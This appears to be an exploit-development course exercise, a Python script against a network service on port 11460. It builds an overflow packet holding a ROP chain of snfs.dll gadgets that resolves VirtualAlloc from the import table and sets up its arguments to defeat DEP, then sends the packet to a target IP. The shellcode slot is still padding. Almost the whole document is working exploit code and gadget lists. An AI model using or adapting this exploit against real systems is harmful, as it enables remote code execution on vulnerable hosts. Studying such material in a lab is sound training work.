Extra Mile 9_4_1_1
import socket
import sys
from struct import pack
# psAgentCommand
buf = bytearray([0x41]*0xC)
buf += pack("<i", 0x534) # opcode
buf += pack("<i", 0x0) # 1st memcpy: offset
buf += pack("<i", 0x500) # 1st memcpy: size field
buf += pack("<i", 0x0) # 2nd memcpy: offset
buf += pack("<i", 0x100) # 2nd memcpy: size field
buf += pack("<i", 0x0) # 3rd memcpy: offset
buf += pack("<i", 0x100) # 3rd memcpy: size field
buf += bytearray([0x41]*0x8)
# psCommandBuffer
offset = b"A" * 276
#ROP
#BB = 00 09 0a 0b 0c 0d 20
'''
GADGETS:
Write:
0x1001526c # mov dword ptr [eax], ecx; ret;
0x10021d7c # mov dword ptr [eax], edx; ret; :: snfs.dll
0x10017bbe # mov dword ptr [ecx], eax; ret; :: snfs.dll
0x10021c99 # mov dword ptr [ecx], edx; ret;
Read:
0x10015fee # mov eax, dword ptr [eax]; ret;
Pop:
0x10012ca5 # pop eax; ret;
0x10010199 # pop ecx; ret;
0x10010103 # pop ebp; ret;
Add:
0x1002259d # add eax, ebp; ret 2;
0x10012ef2 # add ecx, edx; add eax, ecx; pop esi; ret
0x100243be # add ecx, 0x02; mov [esi], ecx; pop esi; ret
0x100152a7 # add eax, 0x0C; ret
Push:
0x100237d1 # push eax; ret; :: snfs.dll
0x1001e4a6 # push esp; ret; :: snfs.dll
0x100113dd # push esp; sub eax, 0x20; pop ebx; ret;
0x10020ff4 # push edx; sar esi, 0xff; pop ecx; ret;
Mov:
0x10023798 # mov eax, ecx; ret 4;
0x10015636 # xchg eax, esp; ret;
0x100189f2 # mov eax, edx; ret;
0x1001b9bd # mov eax, ebx; pop edi; pop ebx; ret
0x10024554 # mov edx, ebx; pop edi; pop ebx; pop esi; ret;
Xor:
'''
'''
Target Stack Layout:
va += pack("<L", (0x41414141)) # dummy VirutalAlloc Address
va += pack("<L", (0x46464646)) # Shellcode Return Address
va += pack("<L", (0x47474747)) # # dummy Shellcode Address
va += pack("<L", (0x48484848)) # dummy dwSize
va += pack("<L", (0x49494949)) # # dummy flAllocationType
va += pack("<L", (0x51515151)) # dummy flProtect
'''
#ecx -> esp :
#rop += pack("<L", ())
rop = pack("<L", (0x100113dd)) # push esp; sub eax, 0x20; pop ebx; ret; ebx -> esp
rop += pack("<L", (0x10024554)) # mov edx, ebx; pop edi; pop ebx; pop esi; ret; edx -> esp
rop += pack("<L", (0x41414141)) #junk
rop += pack("<L", (0x41414141)) #junk
rop += pack("<L", (0x41414141)) #junk
rop += pack("<L", (0x10020ff4)) # push edx; sar esi, 0xff; pop ecx; ret; ecx -> esp
#ecx + 0x00 -> VA
rop += pack("<L", (0x10012ca5)) #pop eax eax -> IAT
rop += pack("<L", (0x100252e0)) #0x100252e0 == IAT VirtualAlloc
rop += pack("<L", (0x10015fee)) #deref eax eax -> VA
rop += pack("<L", (0x10017bbe)) # mov dword ptr [ecx], eax; ret;
#ecx + 0x04 -> eax -> ecx + arbitrary offset for shellcode addr
#pad starts at ecx + 3c
rop += pack("<L", (0x10017caf)) # xor edx, edx; mov eax, esi; pop esi; pop ebx; ret 0x10;
rop += pack("<L", (0x41414141)) #junk
rop += pack("<L", (0x41414141)) #junk
rop += pack("<L", (0x10020322)) # inc edx; add al, 0; xor eax, eax; ret;
rop += pack("<L", (0x41414141)) #junk for ret 0x10
rop += pack("<L", (0x41414141)) #junk
rop += pack("<L", (0x41414141)) #junk
rop += pack("<L", (0x41414141)) #junk
rop += pack("<L", (0x10020322)) # inc edx; add al, 0; xor eax, eax; ret;
rop += pack("<L", (0x10020322)) # inc edx; add al, 0; xor eax, eax; ret;
rop += pack("<L", (0x10020322)) # inc edx; add al, 0; xor eax, eax; ret; edx == 0x04
rop += pack("<L", (0x10012ca5)) # pop eax; ret; :: snfs.dll
#UPDATE w/ offset for shellcode
rop += pack("<L", (0xfffffefc)) # value that is negated
rop += pack("<L", (0x10023779)) # neg eax; ret 4; :: snfs.dll
rop += pack("<L", (0x10012ef2))# add ecx, edx; add eax, ecx; pop esi; ret ecx += 0x04 eax == ecx + 0x3c
rop += pack("<L", (0x41414141)) #junk for ret 4
rop += pack("<L", (0x41414141)) #junk
rop += pack("<L", (0x10017bbe)) # mov dword ptr [ecx], eax; ret;
#ecx + 0x04 -> eax
rop += pack("<L", (0x100150fa)) # inc ecx; clc; mov edx, dword ptr [ecx - 4]; ret;
rop += pack("<L", (0x100150fa)) # inc ecx; clc; mov edx, dword ptr [ecx - 4]; ret;
rop += pack("<L", (0x100150fa)) # inc ecx; clc; mov edx, dword ptr [ecx - 4]; ret;
rop += pack("<L", (0x100150fa)) # inc ecx; clc; mov edx, dword ptr [ecx - 4]; ret;
rop += pack("<L", (0x10017bbe)) # mov dword ptr [ecx], eax; ret; :: snfs.dll
#ecx + 0x04 -> 0x01
rop += pack("<L", (0x10012ca5)) # pop eax; ret; :: snfs.dll
rop += pack("<L", (0xffffffff)) # -1 value that is negated
rop += pack("<L", (0x10023779)) # neg eax; ret 4; :: snfs.dll
rop += pack("<L", (0x100150fa)) # inc ecx; clc; mov edx, dword ptr [ecx - 4]; ret;
rop += pack("<L", (0x41414141)) #junk for ret 4
rop += pack("<L", (0x100150fa)) # inc ecx; clc; mov edx, dword ptr [ecx - 4]; ret;
rop += pack("<L", (0x100150fa)) # inc ecx; clc; mov edx, dword ptr [ecx - 4]; ret;
rop += pack("<L", (0x100150fa)) # inc ecx; clc; mov edx, dword ptr [ecx - 4]; ret;
rop += pack("<L", (0x10017bbe)) # mov dword ptr [ecx], eax; ret; :: snfs.dll
#ecx + 0x04 -> 0x1000
rop += pack("<L", (0x10012ca5)) # pop eax; ret; :: snfs.dll
rop += pack("<L", (0xffffefff)) # -1001
rop += pack("<L", (0x10011b04)) # inc eax; ret; :: snfs.dll -1000
rop += pack("<L", (0x10023779)) # neg eax; ret 4; :: snfs.dll
rop += pack("<L", (0x100150fa)) # inc ecx; clc; mov edx, dword ptr [ecx - 4]; ret;
rop += pack("<L", (0x41414141)) #junk for ret 4
rop += pack("<L", (0x100150fa)) # inc ecx; clc; mov edx, dword ptr [ecx - 4]; ret;
rop += pack("<L", (0x100150fa)) # inc ecx; clc; mov edx, dword ptr [ecx - 4]; ret;
rop += pack("<L", (0x100150fa)) # inc ecx; clc; mov edx, dword ptr [ecx - 4]; ret;
rop += pack("<L", (0x10017bbe)) # mov dword ptr [ecx], eax; ret; :: snfs.dll
#ecx + 0x04 -> 0x80
rop += pack("<L", (0x10012ca5)) # pop eax; ret; :: snfs.dll
rop += pack("<L", (0xffffffc0)) # -40
rop += pack("<L", (0x10023779)) # neg eax; ret 4; :: snfs.dll
rop += pack("<L", (0x100150fa)) # inc ecx; clc; mov edx, dword ptr [ecx - 4]; ret;
rop += pack("<L", (0x41414141)) #junk for ret 4
rop += pack("<L", (0x100150fa)) # inc ecx; clc; mov edx, dword ptr [ecx - 4]; ret;
rop += pack("<L", (0x100150fa)) # inc ecx; clc; mov edx, dword ptr [ecx - 4]; ret;
rop += pack("<L", (0x100150fa)) # inc ecx; clc; mov edx, dword ptr [ecx - 4]; ret;
rop += pack("<L", (0x10017bbe)) # mov dword ptr [ecx], eax; ret; :: snfs.dll
#esp -> ecx - 0x18 ret
rop += pack("<L", (0x10023798)) # mov eax, ecx; ret 4; :: snfs.dll
rop += pack("<L", (0x100113de)) # sub eax, 0x20; pop ebx; ret
rop += pack("<L", (0x41414141)) #junk for ret 4
rop += pack("<L", (0x41414141)) #junk
rop += pack("<L", (0x100152a7)) # add eax, 0x0C; ret
rop += pack("<L", (0x10015636)) # xchg eax, esp; ret; :: snfs.dll
#PAD
pad = b"C" * (0x400 - 276 - len(rop))
formatString = b"File: %s From: %d To: %d ChunkLoc: %d FileLoc: %d" % (offset+rop+pad,0,0,0,0)
buf += formatString
# Checksum
buf = pack(">i", len(buf)-4) + buf
def main():
if len(sys.argv) != 2:
print("Usage: %s <ip_address>\n" % (sys.argv[0]))
sys.exit(1)
server = sys.argv[1]
port = 11460
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((server, port))
s.send(buf)
s.close()
print("[+] Packet sent")
sys.exit(0)
if __name__ == "__main__":
main()Last updated
Was this helpful?